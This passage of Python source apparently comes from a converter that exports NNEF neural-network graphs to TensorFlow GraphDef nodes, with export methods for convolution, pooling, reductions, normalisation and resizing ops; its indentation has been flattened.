self.add_input(tfnode, nnef_node, 'input', [0, 2, 3, 4, 1])
tfnode.attr['data_format'].s = 'NDHWC'.encode('utf-8')
else:
raise ValueError("Cannot handle input_size " + str(conv_len) + " yet.")
tfnode.attr['T'].type = 1
if 'dilation' in nnef_node.parameters:
dilations = nnef_node.parameters['dilation']
if dilations:
nhwc_dilations = [1]
for i in range(0, len(dilations)):
nhwc_dilations.append(dilations[i])
nhwc_dilations.append(1)
else:
nhwc_dilations = [1]*conv_len
else:
nhwc_dilations = [1]*conv_len
tfnode.attr['dilations'].list.i.extend(nhwc_dilations)
strides = nnef_node.parameters['stride']
if strides:
nhwc_strides = [1]
for i in range(0, len(strides)):
nhwc_strides.append(strides[i])
nhwc_strides.append(1)
else:
nhwc_strides = [1]*conv_len
tfnode.attr['strides'].list.i.extend(nhwc_strides)
if conv_len == 4:
tfnode.attr['use_cudnn_on_gpu'].b = True
if nnef_node.parameters['padding'] == []:
tfnode.attr['padding'].s = 'SAME'.encode('utf-8')
elif nnef_node.parameters['padding'] == [(0, 0)]*(conv_len-2):
tfnode.attr['padding'].s = 'VALID'.encode('utf-8')
else:
pads = nnef_node.parameters['padding']
padding = [[0, 0]]
for pad in pads:
padding = padding + [[pad[0], pad[1]]]
padding = padding + [[0, 0]]
padding = np.asarray(padding, dtype=np.int32)
tfnode_pad_const = NodeDef(name=self.format_name(nnef_node.name) + "/Pad/paddings", op='Const')
tfnode_pad_const.attr['dtype'].type = 3
tfnode_pad_const.attr['value'].tensor.dtype = 3
for size in np.shape(padding):
tfnode_pad_const.attr['value'].tensor.tensor_shape.dim.add().size = size
tfnode_pad_const.attr['value'].tensor.tensor_content = padding.tobytes()
self.tf_graph.node.extend([tfnode_pad_const])
tfnode_pad = NodeDef(name=self.format_name(nnef_node.name) + "/Pad", op='Pad')
tfnode_pad.input.extend([tfnode.input[0]])
tfnode_pad.input.extend([tfnode_pad_const.name])
tfnode_pad.attr['T'].type = 1
tfnode_pad.attr['Tpaddings'].type = 3
self.tf_graph.node.extend([tfnode_pad])
tfnode.input[0] = tfnode_pad.name
tfnode.attr['padding'].s = 'VALID'.encode('utf-8')
if('bias' in nnef_node.parameters and nnef_node.parameters['bias'] != 0):
tfnode.name = tfnode.name + '/conv'
self.tf_graph.node.extend([tfnode])
tfnode_add = NodeDef(name=self.format_name(nnef_node.name), op='Add')
tfnode_add.input.extend([tfnode.name])
self.add_input(tfnode_add, nnef_node, 'bias')
tfnode_add.attr['T'].type = 1
self.tf_graph.node.extend([tfnode_add])
else:
self.tf_graph.node.extend([tfnode])
def export_div(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='RealDiv')
self.add_input(tfnode, nnef_node, 'x')
self.add_input(tfnode, nnef_node, 'y')
tfnode.attr['T'].type = 1
self.tf_graph.node.extend([tfnode])
def export_elu(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Elu')
self.add_input(tfnode, nnef_node, 'x')
tfnode.attr['T'].type = 1
self.tf_graph.node.extend([tfnode])
def export_eq(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Equal')
self.add_input(tfnode, nnef_node, 'x')
self.add_input(tfnode, nnef_node, 'y')
tfnode.attr['T'].type = 1
self.tf_graph.node.extend([tfnode])
def export_exp(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Exp')
self.add_input(tfnode, nnef_node, 'x')
tfnode.attr['T'].type = 1
self.tf_graph.node.extend([tfnode])
def export_external(self, nnef_node):
tfnode = NodeDef(name=nnef_node.name, op='Placeholder')
tfnode.attr['dtype'].type = 1
tfnode.attr['shape'].shape.dim.add().size = nnef_node.parameters['shape'][0]
for i in range(2, len(nnef_node.parameters['shape'])):
tfnode.attr['shape'].shape.dim.add().size = nnef_node.parameters['shape'][i]
tfnode.attr['shape'].shape.dim.add().size = nnef_node.parameters['shape'][1]
self.tf_graph.node.extend([tfnode])
def export_floor(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Floor')
self.add_input(tfnode, nnef_node, 'x')
tfnode.attr['T'].type = 1
self.tf_graph.node.extend([tfnode])
def export_ge(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='GreaterEqual')
self.add_input(tfnode, nnef_node, 'x')
self.add_input(tfnode, nnef_node, 'y')
tfnode.attr['T'].type = 1
self.tf_graph.node.extend([tfnode])
def export_gt(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Greater')
self.add_input(tfnode, nnef_node, 'x')
self.add_input(tfnode, nnef_node, 'y')
tfnode.attr['T'].type = 1
self.tf_graph.node.extend([tfnode])
def export_le(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='LessEqual')
self.add_input(tfnode, nnef_node, 'x')
self.add_input(tfnode, nnef_node, 'y')
tfnode.attr['T'].type = 1
self.tf_graph.node.extend([tfnode])
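# export_linear lowers NNEF linear to MatMul + Add.  Inputs with trailing
# spatial dims are squeezed to rank 2 first, and transpose_b is set because
# the NNEF filter is stored as [out_features, in_features].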
def export_linear(self, nnef_node):
input_shape = nnef_node.parameters['input'].output_shape
if len(input_shape) > 2:
i = 1
squeeze_dims = []
for j in range(2, len(input_shape)):
squeeze_dims.append(i)
i += 1
tfnode_squeeze = NodeDef(name=self.format_name(nnef_node.name) + '/squeeze', op='Squeeze')
self.add_input(tfnode_squeeze, nnef_node, 'input')
tfnode_squeeze.attr['T'].type = 1
tfnode_squeeze.attr['squeeze_dims'].list.i.extend(squeeze_dims)
self.tf_graph.node.extend([tfnode_squeeze])
tfnode = NodeDef(name=self.format_name(nnef_node.name) + '/linear', op='MatMul')
if len(input_shape) > 2:
tfnode.input.extend([tfnode_squeeze.name])
else:
self.add_input(tfnode, nnef_node, 'input')
self.add_input(tfnode, nnef_node, 'filter')
tfnode.attr['T'].type = 1
tfnode.attr['transpose_a'].b = False
tfnode.attr['transpose_b'].b = True
self.tf_graph.node.extend([tfnode])
tfnode_add = NodeDef(name=self.format_name(nnef_node.name), op='Add')
tfnode_add.input.extend([tfnode.name])
self.add_input(tfnode_add, nnef_node, 'bias')
tfnode_add.attr['T'].type = 1
self.tf_graph.node.extend([tfnode_add])
def export_local_response_normalization(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='LRN')
self.add_input(tfnode, nnef_node, 'input')
tfnode.attr['T'].type = 1
tfnode.attr['alpha'].f = nnef_node.parameters['alpha']
tfnode.attr['beta'].f = nnef_node.parameters['beta']
tfnode.attr['bias'].f = nnef_node.parameters['bias']
tfnode.attr['depth_radius'].i = nnef_node.parameters['size'][1]
self.tf_graph.node.extend([tfnode])
def export_log(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Log')
self.add_input(tfnode, nnef_node, 'x')
tfnode.attr['T'].type = 1
self.tf_graph.node.extend([tfnode])
def export_lt(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Less')
self.add_input(tfnode, nnef_node, 'x')
self.add_input(tfnode, nnef_node, 'y')
tfnode.attr['T'].type = 1
self.tf_graph.node.extend([tfnode])
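# export_l2_normalization expands to Square -> Sum(keep_dims) -> Maximum(eps)
# -> Rsqrt -> Mul, mirroring tf.nn.l2_normalize; a non-zero NNEF bias has no
# TF equivalent here and is rejected by the assert below.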
def export_l2_normalization(self, nnef_node):
assert(nnef_node.parameters['bias'] == 0.0), "TensorFlow cannot handle non-zero bias for op: l2_normalize"
tfnode_square = NodeDef(name=self.format_name(nnef_node.name) + '/Square', op='Square')
self.add_input(tfnode_square, nnef_node, 'input')
tfnode_square.attr['T'].type = 1
self.tf_graph.node.extend([tfnode_square])
tfnode_const = NodeDef(name=self.format_name(nnef_node.name) + '/Const', op='Const')
tfnode_const.attr['dtype'].type = 3
tfnode_const.attr['value'].tensor.dtype = 3
tfnode_const.attr['value'].tensor.tensor_shape.dim.add().size = len(nnef_node.parameters['axes'])
tfnode_const.attr['value'].tensor.tensor_content = np.asarray(nnef_node.parameters['axes'], dtype=np.int32).tobytes()
self.tf_graph.node.extend([tfnode_const])
tfnode_sum = NodeDef(name=self.format_name(nnef_node.name) + '/Sum', op='Sum')
tfnode_sum.input.extend([tfnode_square.name])
tfnode_sum.input.extend([tfnode_const.name])
tfnode_sum.attr['T'].type = 1
tfnode_sum.attr['Tidx'].type = 3
tfnode_sum.attr['keep_dims'].b = True
self.tf_graph.node.extend([tfnode_sum])
tfnode_max_y = NodeDef(name=self.format_name(nnef_node.name) + '/Maximum/y', op='Const')
tfnode_max_y.attr['dtype'].type = 1
tfnode_max_y.attr['value'].tensor.dtype = 1
tfnode_max_y.attr['value'].tensor.float_val.extend([nnef_node.parameters['epsilon']])
self.tf_graph.node.extend([tfnode_max_y])
tfnode_max = NodeDef(name=self.format_name(nnef_node.name) + '/Maximum', op='Maximum')
tfnode_max.input.extend([tfnode_sum.name])
tfnode_max.input.extend([tfnode_max_y.name])
tfnode_max.attr['T'].type = 1
self.tf_graph.node.extend([tfnode_max])
tfnode_rsqrt = NodeDef(name=self.format_name(nnef_node.name) + '/Rsqrt', op='Rsqrt')
tfnode_rsqrt.input.extend([tfnode_max.name])
tfnode_rsqrt.attr['T'].type = 1
self.tf_graph.node.extend([tfnode_rsqrt])
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Mul')
self.add_input(tfnode, nnef_node, 'input')
tfnode.input.extend([tfnode_rsqrt.name])
tfnode.attr['T'].type = 1
self.tf_graph.node.extend([tfnode])
def export_matmul(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='MatMul')
self.add_input(tfnode, nnef_node, 'A')
self.add_input(tfnode, nnef_node, 'B')
tfnode.attr['T'].type = 1
tfnode.attr['transpose_a'].b = nnef_node.parameters['transposeA']
tfnode.attr['transpose_b'].b = nnef_node.parameters['transposeB']
self.tf_graph.node.extend([tfnode])
def export_max(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Maximum')
self.add_input(tfnode, nnef_node, 'x')
self.add_input(tfnode, nnef_node, 'y')
tfnode.attr['T'].type = 1
self.tf_graph.node.extend([tfnode])
def export_max_pool(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='MaxPool')
self.add_input(tfnode, nnef_node, 'input')
tfnode.attr['T'].type = 1
tfnode.attr['data_format'].s = 'NHWC'.encode('utf-8')
sizes = nnef_node.parameters['size']
nhwc_sizes = [sizes[0]]
for i in range(2, len(sizes)):
nhwc_sizes.append(sizes[i])
nhwc_sizes.append(sizes[1])
tfnode.attr['ksize'].list.i.extend(nhwc_sizes)
dilations = nnef_node.parameters['dilation']
if dilations != [] and dilations != [1]*4:
raise ValueError("TensorFlow does not support dilated pooling")
strides = nnef_node.parameters['stride']
nhwc_strides = [strides[0]]
for i in range(2, len(strides)):
nhwc_strides.append(strides[i])
nhwc_strides.append(strides[1])
tfnode.attr['strides'].list.i.extend(nhwc_strides)
if nnef_node.parameters['padding'] == []:
tfnode.attr['padding'].s = 'SAME'.encode('utf-8')
elif(nnef_node.parameters['padding'] == [(0, 0), (0, 0), (0, 0), (0, 0)]):
tfnode.attr['padding'].s = 'VALID'.encode('utf-8')
else:
pads = nnef_node.parameters['padding']
padding = [[pads[0][0], pads[0][1]]]
for i in range(2, len(pads)):
padding = padding + [[pads[i][0], pads[i][1]]]
padding = padding + [[pads[1][0], pads[1][1]]]
padding = np.asarray(padding, dtype=np.int32)
tfnode_pad_const = NodeDef(name=self.format_name(nnef_node.name) + "/Pad/paddings", op='Const')
tfnode_pad_const.attr['dtype'].type = 3
tfnode_pad_const.attr['value'].tensor.dtype = 3
for size in np.shape(padding):
tfnode_pad_const.attr['value'].tensor.tensor_shape.dim.add().size = size
tfnode_pad_const.attr['value'].tensor.tensor_content = padding.tobytes()
self.tf_graph.node.extend([tfnode_pad_const])
tfnode_pad = NodeDef(name=self.format_name(nnef_node.name) + "/Pad", op='Pad')
tfnode_pad.input.extend([tfnode.input[0]])
tfnode_pad.input.extend([tfnode_pad_const.name])
tfnode_pad.attr['T'].type = 1
tfnode_pad.attr['Tpaddings'].type = 3
self.tf_graph.node.extend([tfnode_pad])
tfnode.input[0] = tfnode_pad.name
tfnode.attr['padding'].s = 'VALID'.encode('utf-8')
self.tf_graph.node.extend([tfnode])
def export_max_pool_with_index(self, nnef_node):
name = nnef_node.name[:nnef_node.name.find(',')]
tfnode = NodeDef(name=self.format_name(name), op='MaxPoolWithArgmax')
self.add_input(tfnode, nnef_node, 'input')
tfnode.attr['T'].type = 1
tfnode.attr['Targmax'].type = 3
sizes = nnef_node.parameters['size']
nhwc_sizes = [sizes[0]]
for i in range(2, len(sizes)):
nhwc_sizes.append(sizes[i])
nhwc_sizes.append(sizes[1])
tfnode.attr['ksize'].list.i.extend(nhwc_sizes)
dilations = nnef_node.parameters['dilation']
if dilations != [] and dilations != [1]*4:
raise ValueError("TensorFlow does not support dilated pooling")
strides = nnef_node.parameters['stride']
nhwc_strides = [strides[0]]
for i in range(2, len(strides)):
nhwc_strides.append(strides[i])
nhwc_strides.append(strides[1])
tfnode.attr['strides'].list.i.extend(nhwc_strides)
if nnef_node.parameters['padding'] == []:
tfnode.attr['padding'].s = 'SAME'.encode('utf-8')
elif(nnef_node.parameters['padding'] == [(0, 0), (0, 0), (0, 0), (0, 0)]):
tfnode.attr['padding'].s = 'VALID'.encode('utf-8')
else:
pads = nnef_node.parameters['padding']
padding = [[pads[0][0], pads[0][1]]]
for i in range(2, len(pads)):
padding = padding + [[pads[i][0], pads[i][1]]]
padding = padding + [[pads[1][0], pads[1][1]]]
padding = np.asarray(padding, dtype=np.int32)
tfnode_pad_const = NodeDef(name=self.format_name(nnef_node.name) + "/Pad/paddings", op='Const')
tfnode_pad_const.attr['dtype'].type = 3
tfnode_pad_const.attr['value'].tensor.dtype = 3
for size in np.shape(padding):
tfnode_pad_const.attr['value'].tensor.tensor_shape.dim.add().size = size
tfnode_pad_const.attr['value'].tensor.tensor_content = padding.tobytes()
self.tf_graph.node.extend([tfnode_pad_const])
tfnode_pad = NodeDef(name=self.format_name(nnef_node.name) + "/Pad", op='Pad')
tfnode_pad.input.extend([tfnode.input[0]])
tfnode_pad.input.extend([tfnode_pad_const.name])
tfnode_pad.attr['T'].type = 1
tfnode_pad.attr['Tpaddings'].type = 3
self.tf_graph.node.extend([tfnode_pad])
tfnode.input[0] = tfnode_pad.name
tfnode.attr['padding'].s = 'VALID'.encode('utf-8')
self.tf_graph.node.extend([tfnode])
def export_max_reduce(self, nnef_node):
tfnode_axes = NodeDef(name=self.format_name(nnef_node.name) + '/axes', op='Const')
tfnode_axes.attr['dtype'].type = 3
array_length = len(nnef_node.parameters['axes'])
new_axes = []
for axis in nnef_node.parameters['axes']:
new_axes.append(self.mapping[axis])
tfnode_axes.attr['value'].tensor.dtype = 3
tfnode_axes.attr['value'].tensor.tensor_shape.dim.add().size = array_length
if array_length == 1:
tfnode_axes.attr['value'].tensor.int_val.extend([new_axes[0]])
else:
tfnode_axes.attr['value'].tensor.tensor_content = np.asarray(new_axes, dtype=np.int32).tobytes()
self.tf_graph.node.extend([tfnode_axes])
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Max')
self.add_input(tfnode, nnef_node, 'input')
tfnode.input.extend([tfnode_axes.name])
tfnode.attr['T'].type = 1
tfnode.attr['Tidx'].type = 3
tfnode.attr['keep_dims'].b = False
self.tf_graph.node.extend([tfnode])
def export_mean_reduce(self, nnef_node):
tfnode_axes = NodeDef(name=self.format_name(nnef_node.name) + '/axes', op='Const')
tfnode_axes.attr['dtype'].type = 3
array_length = len(nnef_node.parameters['axes'])
new_axes = []
for axis in nnef_node.parameters['axes']:
new_axes.append(self.mapping[axis])
tfnode_axes.attr['value'].tensor.dtype = 3
tfnode_axes.attr['value'].tensor.tensor_shape.dim.add().size = array_length
if array_length == 1:
tfnode_axes.attr['value'].tensor.int_val.extend([new_axes[0]])
else:
tfnode_axes.attr['value'].tensor.tensor_content = np.asarray(new_axes, dtype=np.int32).tobytes()
self.tf_graph.node.extend([tfnode_axes])
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Mean')
self.add_input(tfnode, nnef_node, 'input')
tfnode.input.extend([tfnode_axes.name])
tfnode.attr['T'].type = 1
tfnode.attr['Tidx'].type = 3
tfnode.attr['keep_dims'].b = False
self.tf_graph.node.extend([tfnode])
def export_min(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Minimum')
self.add_input(tfnode, nnef_node, 'x')
self.add_input(tfnode, nnef_node, 'y')
tfnode.attr['T'].type = 1
self.tf_graph.node.extend([tfnode])
def export_mul(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Mul')
self.add_input(tfnode, nnef_node, 'x')
self.add_input(tfnode, nnef_node, 'y')
tfnode.attr['T'].type = 1
self.tf_graph.node.extend([tfnode])
def export_multilinear_upsample(self, nnef_node):
tfnode_shape = NodeDef(name=self.format_name(nnef_node.name) + '/size', op='Const')
tfnode_shape.attr['dtype'].type = 3
tfnode_shape.attr['value'].tensor.dtype = 3
output_size = np.asarray(nnef_node.output_shape[2:], dtype=np.int32)
tfnode_shape.attr['value'].tensor.tensor_shape.dim.add().size = len(output_size)
tfnode_shape.attr['value'].tensor.tensor_content = output_size.tobytes()
self.tf_graph.node.extend([tfnode_shape])
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='ResizeBilinear')
self.add_input(tfnode, nnef_node, 'input')
tfnode.input.extend([tfnode_shape.name])
tfnode.attr['T'].type = 1
tfnode.attr['align_corners'].b = False
self.tf_graph.node.extend([tfnode])
def export_ne(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='NotEqual')
self.add_input(tfnode, nnef_node, 'x')
self.add_input(tfnode, nnef_node, 'y')
tfnode.attr['T'].type = 1
self.tf_graph.node.extend([tfnode])
def export_nearest_downsample(self, nnef_node):
tfnode_shape = NodeDef(name=self.format_name(nnef_node.name) + '/size', op='Const')
tfnode_shape.attr['dtype'].type = 3
tfnode_shape.attr['value'].tensor.dtype = 3
output_size = np.asarray(nnef_node.output_shape[2:], dtype=np.int32)
tfnode_shape.attr['value'].tensor.tensor_shape.dim.add().size = len(output_size)
tfnode_shape.attr['value'].tensor.tensor_content = output_size.tobytes()
self.tf_graph.node.extend([tfnode_shape])
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='ResizeNearestNeighbor')
self.add_input(tfnode, nnef_node, 'input')
tfnode.input.extend([tfnode_shape.name])
tfnode.attr['T'].type = 1
tfnode.attr['align_corners'].b = False
self.tf_graph.node.extend([tfnode])
def export_nearest_upsample(self, nnef_node):
tfnode_shape = NodeDef(name=self.format_name(nnef_node.name) + '/size', op='Const')
tfnode_shape.attr['dtype'].type = 3
tfnode_shape.attr['value'].tensor.dtype = 3
output_size = np.asarray(nnef_node.output_shape[2:], dtype=np.int32)
tfnode_shape.attr['value'].tensor.tensor_shape.dim.add().size = len(output_size)
tfnode_shape.attr['value'].tensor.tensor_content = output_size.tobytes()
self.tf_graph.node.extend([tfnode_shape])
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='ResizeNearestNeighbor')
self.add_input(tfnode, nnef_node, 'input')
tfnode.input.extend([tfnode_shape.name])
tfnode.attr['T'].type = 1
tfnode.attr['align_corners'].b = False
self.tf_graph.node.extend([tfnode])
def export_neg(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Neg')
self.add_input(tfnode, nnef_node, 'x')
tfnode.attr['T'].type = 1
self.tf_graph.node.extend([tfnode])
def export_not(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='LogicalNot')
self.add_input(tfnode, nnef_node, 'x')
self.tf_graph.node.extend([tfnode])
def export_or(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='LogicalOr')
self.add_input(tfnode, nnef_node, 'x')
self.add_input(tfnode, nnef_node, 'y')
self.tf_graph.node.extend([tfnode])
def export_output_val(self, nnef_node):
return
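# export_planewise_conv emits DepthwiseConv2dNative.  When the NNEF filter is
# stored with the channel multiplier folded into its first dimension, it is
# reshaped to [channels_in, multiplier, H, W] before the [2, 3, 0, 1] reorder
# produces TF's [H, W, channels_in, multiplier] layout.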
def export_planewise_conv(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='DepthwiseConv2dNative')
self.add_input(tfnode, nnef_node, 'input', [0, 2, 3, 1])
#Converts to Tensorflow format of [height, width, channels in, channel multiplier]
if nnef_node.parameters['input'].output_shape[1] != nnef_node.parameters['filter'].parameters['shape'][0]:
filter_node = nnef_node.parameters['filter']
np_array_read = filter_node.get_tensordatafile().get_data().get_array()[0]
np_array_read = np.reshape(np_array_read, filter_node.parameters['shape'])
new_shape = [nnef_node.parameters['input'].output_shape[1]]
new_shape.append(int(filter_node.output_shape[0]/new_shape[0]))
new_shape += filter_node.parameters['shape'][2:]
filter_node.parameters['shape'] = new_shape
np_array_read = np.reshape(np_array_read, new_shape)
filter_node.get_tensordatafile().get_data().set_array(np_array_read, override=True)
self.add_input(tfnode, nnef_node, 'filter', [2, 3, 0, 1])
tfnode.attr['T'].type = 1
tfnode.attr['data_format'].s = 'NHWC'.encode('utf-8')
if 'dilation' in nnef_node.parameters:
dilations = nnef_node.parameters['dilation']
if dilations:
nhwc_dilations = [1]
for i in range(0, len(dilations)):
nhwc_dilations.append(dilations[i])
nhwc_dilations.append(1)
else:
nhwc_dilations = [1]*4
else:
nhwc_dilations = [1]*4
tfnode.attr['dilations'].list.i.extend(nhwc_dilations)
strides = nnef_node.parameters['stride']
if strides:
nhwc_strides = [1]
for i in range(0, len(strides)):
nhwc_strides.append(strides[i])
nhwc_strides.append(1)
else:
nhwc_strides = [1]*4
tfnode.attr['strides'].list.i.extend(nhwc_strides)
if nnef_node.parameters['padding'] == []:
tfnode.attr['padding'].s = 'SAME'.encode('utf-8')
elif nnef_node.parameters['padding'] == [(0, 0)]*(2):
tfnode.attr['padding'].s = 'VALID'.encode('utf-8')
else:
pads = nnef_node.parameters['padding']
padding = [[0, 0]]
for pad in pads:
padding = padding + [[pad[0], pad[1]]]
padding = padding + [[0, 0]]
padding = np.asarray(padding, dtype=np.int32)
tfnode_pad_const = NodeDef(name=self.format_name(nnef_node.name) + "/Pad/paddings", op='Const')
tfnode_pad_const.attr['dtype'].type = 3
tfnode_pad_const.attr['value'].tensor.dtype = 3
for size in np.shape(padding):
tfnode_pad_const.attr['value'].tensor.tensor_shape.dim.add().size = size
tfnode_pad_const.attr['value'].tensor.tensor_content = padding.tobytes()
self.tf_graph.node.extend([tfnode_pad_const])
tfnode_pad = NodeDef(name=self.format_name(nnef_node.name) + "/Pad", op='Pad')
tfnode_pad.input.extend([tfnode.input[0]])
tfnode_pad.input.extend([tfnode_pad_const.name])
tfnode_pad.attr['T'].type = 1
tfnode_pad.attr['Tpaddings'].type = 3
self.tf_graph.node.extend([tfnode_pad])
tfnode.input[0] = tfnode_pad.name
tfnode.attr['padding'].s = 'VALID'.encode('utf-8')
if('bias' in nnef_node.parameters and nnef_node.parameters['bias'] != 0):
tfnode.name = tfnode.name + '/conv'
self.tf_graph.node.extend([tfnode])
tfnode_add = NodeDef(name=self.format_name(nnef_node.name), op='Add')
tfnode_add.input.extend([tfnode.name])
self.add_input(tfnode_add, nnef_node, 'bias')
tfnode_add.attr['T'].type = 1
self.tf_graph.node.extend([tfnode_add])
else:
self.tf_graph.node.extend([tfnode])
def export_pow(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Pow')
self.add_input(tfnode, nnef_node, 'x')
self.add_input(tfnode, nnef_node, 'y')
tfnode.attr['T'].type = 1
self.tf_graph.node.extend([tfnode])
def export_relu(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Relu')
self.add_input(tfnode, nnef_node, 'x')
tfnode.attr['T'].type = 1
self.tf_graph.node.extend([tfnode])
def export_reshape(self, nnef_node):
tfnode_shape = NodeDef(name=self.format_name(nnef_node.name) + '/shape', op='Const')
tfnode_shape.attr['dtype'].type = 3
tfnode_shape.attr['value'].tensor.dtype = 3
tfnode_shape.attr['value'].tensor.tensor_shape.dim.add().size = len(nnef_node.parameters['shape'])
if len(nnef_node.parameters['shape']) == 1:
tfnode_shape.attr['value'].tensor.int_val.extend([nnef_node.parameters['shape'][0]])
else:
shape_array = np.asarray(nnef_node.parameters['shape'])
tfnode_shape.attr['value'].tensor.tensor_content = np.asarray(shape_array, dtype=np.int32).tobytes()
self.tf_graph.node.extend([tfnode_shape])
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Reshape')
self.add_input(tfnode, nnef_node, 'input')
tfnode.input.extend([self.format_name(nnef_node.name) + '/shape'])
tfnode.attr['T'].type = 1
tfnode.attr['Tshape'].type = 3
self.tf_graph.node.extend([tfnode])
def export_round(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Round')
self.add_input(tfnode, nnef_node, 'x')
tfnode.attr['T'].type = 1
self.tf_graph.node.extend([tfnode])
def export_rsqrt(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Rsqrt')
self.add_input(tfnode, nnef_node, 'x')
tfnode.attr['T'].type = 1
self.tf_graph.node.extend([tfnode])
def export_select(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Select')
self.add_input(tfnode, nnef_node, 'condition')
self.add_input(tfnode, nnef_node, 'true_value')
self.add_input(tfnode, nnef_node, 'false_value')
tfnode.attr['T'].type = 1
self.tf_graph.node.extend([tfnode])
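# export_separable_conv splits NNEF separable_conv into a
# DepthwiseConv2dNative on plane_filter (with the same padding emulation as
# above) followed by a 1x1 Conv2D on point_filter and an optional bias Add.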
def export_separable_conv(self, nnef_node):
tfnode_depthwise = NodeDef(name=self.format_name(nnef_node.name) + '/depthwise', op='DepthwiseConv2dNative')
self.add_input(tfnode_depthwise, nnef_node, 'input', [0, 2, 3, 1])
#Converts to Tensorflow format of [height, width, channels in, channel multiplier]
if nnef_node.parameters['input'].output_shape[1] != nnef_node.parameters['plane_filter'].parameters['shape'][0]:
filter_node = nnef_node.parameters['plane_filter']
np_array_read = filter_node.get_tensordatafile().get_data().get_array()[0]
np_array_read = np.reshape(np_array_read, filter_node.parameters['shape'])
new_shape = [nnef_node.parameters['input'].output_shape[1]]
new_shape.append(int(filter_node.output_shape[0]/new_shape[0]))
new_shape += filter_node.parameters['shape'][2:]
filter_node.parameters['shape'] = new_shape
np_array_read = np.reshape(np_array_read, new_shape)
filter_node.get_tensordatafile().get_data().set_array(np_array_read, override=True)
self.add_input(tfnode_depthwise, nnef_node, 'plane_filter', [2, 3, 0, 1])
tfnode_depthwise.attr['T'].type = 1
tfnode_depthwise.attr['data_format'].s = 'NHWC'.encode('utf-8')
if 'dilation' in nnef_node.parameters:
dilations = nnef_node.parameters['dilation']
if dilations:
nhwc_dilations = [1]
for i in range(0, len(dilations)):
nhwc_dilations.append(dilations[i])
nhwc_dilations.append(1)
else:
nhwc_dilations = [1]*4
else:
nhwc_dilations = [1]*4
tfnode_depthwise.attr['dilations'].list.i.extend(nhwc_dilations)
strides = nnef_node.parameters['stride']
if strides:
nhwc_strides = [1]
for i in range(0, len(strides)):
nhwc_strides.append(strides[i])
nhwc_strides.append(1)
else:
nhwc_strides = [1]*4
tfnode_depthwise.attr['strides'].list.i.extend(nhwc_strides)
if nnef_node.parameters['padding'] == []:
tfnode_depthwise.attr['padding'].s = 'SAME'.encode('utf-8')
elif nnef_node.parameters['padding'] == [(0, 0)]*(2):
tfnode_depthwise.attr['padding'].s = 'VALID'.encode('utf-8')
else:
pads = nnef_node.parameters['padding']
padding = [[0, 0]]
for pad in pads:
padding = padding + [[pad[0], pad[1]]]
padding = padding + [[0, 0]]
padding = np.asarray(padding, dtype=np.int32)
tfnode_pad_const = NodeDef(name=self.format_name(nnef_node.name) + "/depthwise/Pad/paddings", op='Const')
tfnode_pad_const.attr['dtype'].type = 3
tfnode_pad_const.attr['value'].tensor.dtype = 3
for size in np.shape(padding):
tfnode_pad_const.attr['value'].tensor.tensor_shape.dim.add().size = size
tfnode_pad_const.attr['value'].tensor.tensor_content = padding.tobytes()
self.tf_graph.node.extend([tfnode_pad_const])
tfnode_pad = NodeDef(name=self.format_name(nnef_node.name) + "/depthwise/Pad", op='Pad')
tfnode_pad.input.extend([tfnode_depthwise.input[0]])
tfnode_pad.input.extend([tfnode_pad_const.name])
tfnode_pad.attr['T'].type = 1
tfnode_pad.attr['Tpaddings'].type = 3
self.tf_graph.node.extend([tfnode_pad])
tfnode_depthwise.input[0] = tfnode_pad.name
tfnode_depthwise.attr['padding'].s = 'VALID'.encode('utf-8')
self.tf_graph.node.extend([tfnode_depthwise])
conv_len = len(nnef_node.parameters['input'].output_shape)
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Conv2D')
tfnode.input.extend([tfnode_depthwise.name])
self.add_input(tfnode, nnef_node, 'point_filter', [2, 3, 1, 0])
tfnode.attr['data_format'].s = 'NHWC'.encode('utf-8')
tfnode.attr['use_cudnn_on_gpu'].b = True
tfnode.attr['T'].type = 1
nhwc_dilations = [1]*conv_len
tfnode.attr['dilations'].list.i.extend(nhwc_dilations)
nhwc_strides = [1]*conv_len
tfnode.attr['strides'].list.i.extend(nhwc_strides)
tfnode.attr['padding'].s = 'SAME'.encode('utf-8')
if('bias' in nnef_node.parameters and nnef_node.parameters['bias'] != 0):
tfnode.name = tfnode.name + '/conv'
self.tf_graph.node.extend([tfnode])
tfnode_add = NodeDef(name=self.format_name(nnef_node.name), op='Add')
tfnode_add.input.extend([tfnode.name])
